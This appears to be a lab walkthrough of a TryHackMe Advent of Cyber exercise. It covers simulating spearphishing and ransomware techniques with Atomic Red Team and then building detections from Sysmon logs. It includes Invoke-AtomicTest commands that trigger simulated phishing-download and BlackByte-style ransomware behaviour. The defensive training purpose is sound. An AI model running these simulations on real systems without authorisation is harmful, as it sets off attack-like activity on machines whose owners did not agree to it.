THM AOC2024 Day 4: Strengthening Defenses with Attack Simulations
Every December, TryHackMe's Advent of Cyber delivers 24 free daily cybersecurity challenges, offering hands-on scenarios that simulate real-world attacks and defenses. Designed for beginners and professionals alike, it's an exciting, gamified way to explore topics like threat hunting, penetration testing, cryptography, and more. This event is perfect for building skills, gaining practical experience, and spreading some cybersecurity cheer during the festive season!
Learning Objectives
- Learn to identify malicious techniques using the MITRE ATT&CK framework.
- Explore the use of Atomic Red Team tests to simulate attack techniques.
- Understand how to create detection and alerting rules from attack simulations.
Tools of the Day
- MITRE ATT&CK Framework: A comprehensive database of tactics, techniques, and procedures (TTPs) used by threat actors.
- Atomic Red Team: A library of test cases for emulating attacks based on MITRE ATT&CK techniques.
- Windows Sysmon: A tool that provides detailed information about system activities, such as process creation and file changes.
Deep Dive Into the Tools
1. MITRE ATT&CK Framework
The MITRE ATT&CK Framework provides a structured way to analyze and understand attacker behaviors. It maps out tactics (goals of an attack) and techniques (specific methods used) into an accessible matrix. This framework is invaluable for building defense-in-depth strategies by ensuring detections cover the entire kill chain.
2. Atomic Red Team
Atomic Red Team simplifies testing detection gaps by providing predefined test cases mapped to MITRE ATT&CK techniques. These tests allow blue teams to simulate real-world attacks in controlled environments and evaluate their detection capabilities.
3. Sysmon
Sysmon logs granular system events, such as process creation and network connections, that help analysts detect malicious activity. Combined with tools like ELK or Sigma rules, Sysmon data forms the backbone of effective detection strategies.
Operation Blue: Investigating a Spearphishing Attack
1. Understanding Detection Gaps
Detection gaps occur due to evolving attacker techniques or overlapping normal and malicious behavior. The MITRE ATT&CK framework helps prioritize detections by mapping them across the kill chain, ensuring multiple opportunities to identify malicious activity.
2. Running the Atomic Test for Spearphishing
To simulate a spearphishing attack (T1566.001), we executed the following Atomic Red Team command in PowerShell:
powershellCopy codeInvoke-AtomicTest T1566.001 -TestNumbers 1
This emulated a phishing attachment download, generating artifacts like the PhishingAttachment.xlsm file.
3. Analyzing Logs Using Sysmon
Using Sysmon logs, we identified key artifacts:
- A process creation event for PowerShell executing the
Invoke-WebRequestcommand. - File creation of
PhishingAttachment.xlsm.
These findings provided the necessary indicators of compromise (IOCs) to create detection rules.
Operation Red: Simulating a Ransomware Attack
1. Selecting the Correct Technique
The ransomware simulation focused on the ATT&CK subtechnique T1059.003 (Windows Command Shell).
2. Executing the Ransomware Simulation
The following Atomic test was chosen:
Test Name: Simulate BlackByte Ransomware Print Bombing
Command:
powershellCopy codeInvoke-AtomicTest T1059.003 -TestNames "Simulate BlackByte Ransomware Print Bombing"
This test generated the file Wareville_Ransomware.txt, confirming successful execution.
3. Key Findings
The test produced actionable artifacts:
- Command executions logged in Sysmon.
- File creation events for
Wareville_Ransomware.txt.
These details were used to draft detection rules for ransomware behaviors.
Recap of Learning Objectives
1. Identifying Malicious Techniques Using the MITRE ATT&CK Framework
The MITRE ATT&CK framework serves as a guide for blue teams, mapping real-world adversary tactics and techniques into a structured matrix. In this task, we used the framework to identify specific techniques like T1566.001 (Spearphishing Attachment) and T1059.003 (Windows Command Shell). Beyond the room, this framework is invaluable for aligning defenses with known threats, planning proactive detection strategies, and conducting risk assessments in enterprise environments.
In the real world, security teams often use MITRE ATT&CK to conduct tabletop exercises, train SOC analysts, and audit their coverage of critical TTPs. Its ability to link behaviors to specific threat actors also helps organizations anticipate potential adversaries.
2. Using Atomic Red Team for Attack Simulations
Atomic Red Team makes the theoretical actionable by providing easily executable tests for MITRE ATT&CK techniques. This tool is a game-changer for organizations seeking to validate their defenses, train their SOC teams, or understand how their detection tools respond to specific TTPs.
In practice, Atomic Red Team can be used in combination with continuous security validation platforms to run automated simulations across the environment, ensuring consistent monitoring and readiness. Security teams can even customize tests to reflect unique organizational risks or emulate recent threat actor behaviors.
3. Creating Alerting and Detection Rules
This task emphasized transforming simulated attacks into actionable detection rules. By analyzing Sysmon logs, we extracted IOCs like PowerShell commands and file creation events, translating them into Sigma rules for monitoring and alerting.
Outside of this room, this process is critical for strengthening a SOC's detection capabilities. For example, detection rules derived from red team engagements or past incidents can be deployed across EDR, SIEM, or XDR solutions, enabling faster and more effective responses to future attacks. Organizations can also maintain a rule library to adapt quickly to emerging threats.
Real-World Context
Combining these tools and techniques allows organizations to maintain a proactive security posture. Threat actors constantly evolve, but by leveraging frameworks like MITRE ATT&CK and tools like Atomic Red Team, security teams can stay ahead. More importantly, these simulations foster collaboration between red and blue teams, creating a feedback loop that drives continuous improvement.
This process not only mitigates current threats but also builds resilience, ensuring organizations can adapt to future challenges. Are your defenses up to the task? This methodology can help answer that question.
